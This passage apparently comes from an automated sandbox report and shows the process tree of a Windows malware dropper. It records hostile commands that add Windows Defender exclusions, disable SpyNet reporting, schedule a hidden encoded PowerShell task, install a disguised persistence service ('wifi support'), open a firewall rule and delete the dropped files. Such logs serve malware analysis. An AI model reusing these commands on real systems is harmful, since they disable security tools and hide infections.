                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
                                                                                                                                8⤵
                                                                                                                                  PID:2844
                                                                                                                          • C:\Users\Admin\Documents\AZ2LLsQ37bDGD7dsauRPtL7d.exe
                                                                                                                            "C:\Users\Admin\Documents\AZ2LLsQ37bDGD7dsauRPtL7d.exe"
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:3632
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im AZ2LLsQ37bDGD7dsauRPtL7d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\AZ2LLsQ37bDGD7dsauRPtL7d.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:4676
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /im AZ2LLsQ37bDGD7dsauRPtL7d.exe /f
                                                                                                                                7⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:4076
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                timeout /t 6
                                                                                                                                7⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:3512
                                                                                                                          • C:\Users\Admin\Documents\Vrm6vXsHUik_IpAgcYtvnYSB.exe
                                                                                                                            "C:\Users\Admin\Documents\Vrm6vXsHUik_IpAgcYtvnYSB.exe"
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4292
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 624
                                                                                                                              6⤵
                                                                                                                              • Program crash
                                                                                                                              PID:5072
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 632
                                                                                                                              6⤵
                                                                                                                              • Program crash
                                                                                                                              PID:4512
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 696
                                                                                                                              6⤵
                                                                                                                              • Program crash
                                                                                                                              PID:4392
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 804
                                                                                                                              6⤵
                                                                                                                              • Program crash
                                                                                                                              PID:900
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 1232
                                                                                                                              6⤵
                                                                                                                              • Program crash
                                                                                                                              PID:912
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "Vrm6vXsHUik_IpAgcYtvnYSB.exe" /f & erase "C:\Users\Admin\Documents\Vrm6vXsHUik_IpAgcYtvnYSB.exe" & exit
                                                                                                                              6⤵
                                                                                                                                PID:5212
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /im "Vrm6vXsHUik_IpAgcYtvnYSB.exe" /f
                                                                                                                                  7⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:5744
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 1352
                                                                                                                                6⤵
                                                                                                                                • Program crash
                                                                                                                                PID:5412
                                                                                                                            • C:\Users\Admin\Documents\gqdVXxwhDprWklfpm9d7fwMF.exe
                                                                                                                              "C:\Users\Admin\Documents\gqdVXxwhDprWklfpm9d7fwMF.exe"
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks computer location settings
                                                                                                                              PID:2068
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                                                                                6⤵
                                                                                                                                  PID:2128
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd
                                                                                                                                    7⤵
                                                                                                                                      PID:4660
                                                                                                                                • C:\Users\Admin\Documents\DUhjf6DNPmiiq8SY1lT0Gepn.exe
                                                                                                                                  "C:\Users\Admin\Documents\DUhjf6DNPmiiq8SY1lT0Gepn.exe"
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:4408
                                                                                                                                • C:\Users\Admin\Documents\S7KUh0oTwHKXo5l8CiWl_mew.exe
                                                                                                                                  "C:\Users\Admin\Documents\S7KUh0oTwHKXo5l8CiWl_mew.exe"
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:632
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kxxiofyz\
                                                                                                                                    6⤵
                                                                                                                                      PID:2328
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        7⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        PID:228
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wzpohjqt.exe" C:\Windows\SysWOW64\kxxiofyz\
                                                                                                                                      6⤵
                                                                                                                                        PID:1400
                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                        "C:\Windows\System32\sc.exe" create kxxiofyz binPath= "C:\Windows\SysWOW64\kxxiofyz\wzpohjqt.exe /d\"C:\Users\Admin\Documents\S7KUh0oTwHKXo5l8CiWl_mew.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                        6⤵
                                                                                                                                          PID:1504
                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                          "C:\Windows\System32\sc.exe" description kxxiofyz "wifi internet conection"
                                                                                                                                          6⤵
                                                                                                                                            PID:2060
                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                            "C:\Windows\System32\sc.exe" start kxxiofyz
                                                                                                                                            6⤵
                                                                                                                                              PID:3624
                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                              6⤵
                                                                                                                                                PID:3644
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 632 -s 676
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:3564
                                                                                                                                            • C:\Users\Admin\Documents\njNjPJOiUltMwBWBky7Ml4Uv.exe
                                                                                                                                              "C:\Users\Admin\Documents\njNjPJOiUltMwBWBky7Ml4Uv.exe"
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:4868
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:3512
                                                                                                                                              • C:\Users\Admin\Documents\4GKapvhSE2sgVgtVbjZ3ZFEE.exe
                                                                                                                                                "C:\Users\Admin\Documents\4GKapvhSE2sgVgtVbjZ3ZFEE.exe"
                                                                                                                                                5⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4328
                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                                                                                                  6⤵
                                                                                                                                                    PID:1148
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 620
                                                                                                                                                    6⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:4952
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 960
                                                                                                                                                    6⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:3140
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 1060
                                                                                                                                                    6⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:1656
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 1068
                                                                                                                                                    6⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:5652
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 972
                                                                                                                                                    6⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:1784
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 1032
                                                                                                                                                    6⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:1304
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 1064
                                                                                                                                                    6⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:4768
                                                                                                                                                • C:\Users\Admin\Documents\k5sTCx59kg7bGhPKqyy_3cE6.exe
                                                                                                                                                  "C:\Users\Admin\Documents\k5sTCx59kg7bGhPKqyy_3cE6.exe"
                                                                                                                                                  5⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  PID:452
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:4636
                                                                                                                                                  • C:\Users\Admin\Documents\Uu4J14WF3liPVYxOX2qo58Ef.exe
                                                                                                                                                    "C:\Users\Admin\Documents\Uu4J14WF3liPVYxOX2qo58Ef.exe"
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:1420
                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:4612
                                                                                                                                                    • C:\Users\Admin\Documents\Jm_qPnGdlBZ6UqMyfknUUbqv.exe
                                                                                                                                                      "C:\Users\Admin\Documents\Jm_qPnGdlBZ6UqMyfknUUbqv.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4904
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4904 -s 432
                                                                                                                                                        6⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:3196
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4904 -s 440
                                                                                                                                                        6⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:4804
                                                                                                                                                    • C:\Users\Admin\Documents\2MbSEAvYIv09IV5wPbUr5_jw.exe
                                                                                                                                                      "C:\Users\Admin\Documents\2MbSEAvYIv09IV5wPbUr5_jw.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4944
                                                                                                                                                    • C:\Users\Admin\Documents\Fin6pZgtyTlUN5W0nN7rDJWz.exe
                                                                                                                                                      "C:\Users\Admin\Documents\Fin6pZgtyTlUN5W0nN7rDJWz.exe"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:4676
                                                                                                                                                        • C:\Users\Admin\Documents\Fin6pZgtyTlUN5W0nN7rDJWz.exe
                                                                                                                                                          "C:\Users\Admin\Documents\Fin6pZgtyTlUN5W0nN7rDJWz.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:3168
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 536
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:3688
                                                                                                                                                      • C:\Users\Admin\Documents\hQ2VfWzei0wXIQDEBnsrChuJ.exe
                                                                                                                                                        "C:\Users\Admin\Documents\hQ2VfWzei0wXIQDEBnsrChuJ.exe"
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:260
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:4184
                                                                                                                                                        • C:\Users\Admin\Documents\NI7qXyyPl8ikH8uIix3jOChn.exe
                                                                                                                                                          "C:\Users\Admin\Documents\NI7qXyyPl8ikH8uIix3jOChn.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Checks computer location settings
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:3712
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\222b5854-8e39-425b-a371-7402b1302e11.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\222b5854-8e39-425b-a371-7402b1302e11.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:2624
                                                                                                                                                        • C:\Users\Admin\Documents\TTEYuXpHNCov4FehRNzJT1uu.exe
                                                                                                                                                          "C:\Users\Admin\Documents\TTEYuXpHNCov4FehRNzJT1uu.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:1632
                                                                                                                                                        • C:\Users\Admin\Documents\_vtc7mH8h66gaMPfkidkK3Ao.exe
                                                                                                                                                          "C:\Users\Admin\Documents\_vtc7mH8h66gaMPfkidkK3Ao.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:3492
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:3464
                                                                                                                                                          • C:\Users\Admin\Documents\ie_aP1q9oSn3nJEGFn7QSw8C.exe
                                                                                                                                                            "C:\Users\Admin\Documents\ie_aP1q9oSn3nJEGFn7QSw8C.exe"
                                                                                                                                                            5⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:3224
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS1A28.tmp\Install.exe
                                                                                                                                                              .\Install.exe
                                                                                                                                                              6⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:4144
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS335D.tmp\Install.exe
                                                                                                                                                                .\Install.exe /S /site_id "525403"
                                                                                                                                                                7⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:1964
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:3720
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:4076
                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:632
                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                            10⤵
                                                                                                                                                                              PID:5116
                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:3656
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:1052
                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:2804
                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                    10⤵
                                                                                                                                                                                      PID:1312
                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  schtasks /CREATE /TN "gqlczHxbE" /SC once /ST 04:12:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                  PID:5084
                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  schtasks /run /I /tn "gqlczHxbE"
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:1784
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /DELETE /F /TN "gqlczHxbE"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:5920
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 05:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\WnvhmoW.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                                                                                                                                      8⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:912
                                                                                                                                                                              • C:\Users\Admin\Documents\OQRFErOllNvJnOC9n8MdBECL.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\OQRFErOllNvJnOC9n8MdBECL.exe"
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:2004
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c timeout 45
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:4540
                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                      timeout 45
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                      PID:2328
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:1736
                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:4500
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c zaiqa_6.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:5036
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_6.exe
                                                                                                                                                                                    zaiqa_6.exe
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:4896
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c zaiqa_5.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:4608
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_5.exe
                                                                                                                                                                                    zaiqa_5.exe
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                    PID:1632
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-OT5CF.tmp\zaiqa_5.tmp
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-OT5CF.tmp\zaiqa_5.tmp" /SL5="$40172,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_5.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      PID:3492
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c zaiqa_4.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:4600
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_4.exe
                                                                                                                                                                                    zaiqa_4.exe
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:3292
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_4.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_4.exe
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:4564
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4904 -ip 4904
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4800
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4292 -ip 4292
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4512
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3168 -ip 3168
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4316
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4328 -ip 4328
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:1440
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4408 -ip 4408
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:1844
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4292 -ip 4292
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3160
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4904 -ip 4904
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4072
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4292 -ip 4292
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:3672
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 632 -ip 632
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:1152
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5000 -ip 5000
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4072
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4292 -ip 4292
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:2392
                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -pss -s 608 -p 2556 -ip 2556
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:3324
                                                                                                                                                                                                    • C:\Windows\SysWOW64\kxxiofyz\wzpohjqt.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\kxxiofyz\wzpohjqt.exe /d"C:\Users\Admin\Documents\S7KUh0oTwHKXo5l8CiWl_mew.exe"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:2688
                                                                                                                                                                                                        • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                          svchost.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:1284
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2688 -s 540
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            PID:3480
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2688 -ip 2688
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:360
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5000 -ip 5000
